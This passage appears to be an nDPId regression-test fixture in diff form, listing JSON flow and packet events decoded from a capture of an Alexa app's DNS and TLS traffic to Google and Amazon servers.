+00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1490976195921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1490976195921,"pkt":"AMDKkaPvePiC0\/vCCABFAABNWmZAAEARM0CsECrYrBAqARIEADUAOVP\/iiYBAAABAAAAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAQ=="} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1490976195980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1490976195980,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC37AVAAEARoTasECoBrBAq2AA1EgQAo8CaiiaBgAABAAUAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAMAHg1kazlwczdnb3FvZWVmCmNsb3VkZnJvbnQDbmV0AMA9AAEAAQAAADsABDRUPnPAPQABAAEAAAA7AAQ0VD7rwD0AAQABAAAAOwAENFQ+v8A9AAEAAQAAADsABDRUPj4="} 
00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195983,"flow_last_seen":1490976195983,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195983,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1490976195983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195983,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8wa5AAEAGL16sECrYNFQ+c6O4AbsdU0twAAAAAKAC\/\/9kRAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195984,"flow_last_seen":1490976195984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195984,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1490976195984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195984,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnNAAEAG5pmsECrYNFQ+c6O5Abv6a4CtAAAAAKAC\/\/9R7QAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195985,"flow_last_seen":1490976195985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195985,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1490976195985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195985,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MZ1AAEAGv2+sECrYNFQ+c6O6AbtYObtDAAAAAKAC\/\/+5iAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1490976196000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196000,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7kDZGUl+muArqAScSCFQwAAAgQFtAQCCAps+oX0APaK3gEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1490976196001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196001,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7jUvy2sHVNLcaAScSD3DwAAAgQFtAQCCAps+oycAPaK3gEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1490976196002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196002,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0CnRAAEAG5qCsECrYNFQ+c6O5Abv6a4CuA2RlJoAQAVcj2AAAAQEICgD2iuBs+oX0"} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1490976196003,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196003,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0wa9AAEAGL2WsECrYNFQ+c6O4AbsdU0tx1L8trYAQAVeVpAAAAQEICgD2iuBs+oyc"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1490976196008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196008,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7r33SsOWDm7RKAScSApGwAAAgQFtAQCCAps+o9VAPaK3gEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1490976196009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MZ5AAEAGv3asECrYNFQ+c6O6AbtYObtE990rD4AQAVfHrwAAAQEICgD2iuBs+o9V"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196016,"flow_last_seen":1490976196016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196016,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1490976196016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196016,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8LWlAAEAG4smsECrYNu8csuLAAbtkEKeIAAAAAKAC\/\/+hiQAAAgQFtAQCCAoA9orhAAAAAAEDAwg="} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} 
-00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2910,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1490976196075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976196075,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIa5AAOcGR5A27xyyrBAq2AG74sBbwNFvZBCniXASH\/4cPAAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2911,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1490976196075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976196075,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoLWpAAEAG4tysECrYNu8csuLAAbtkEKeJW8DRcFAQAVdmrQAA"} 
-00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 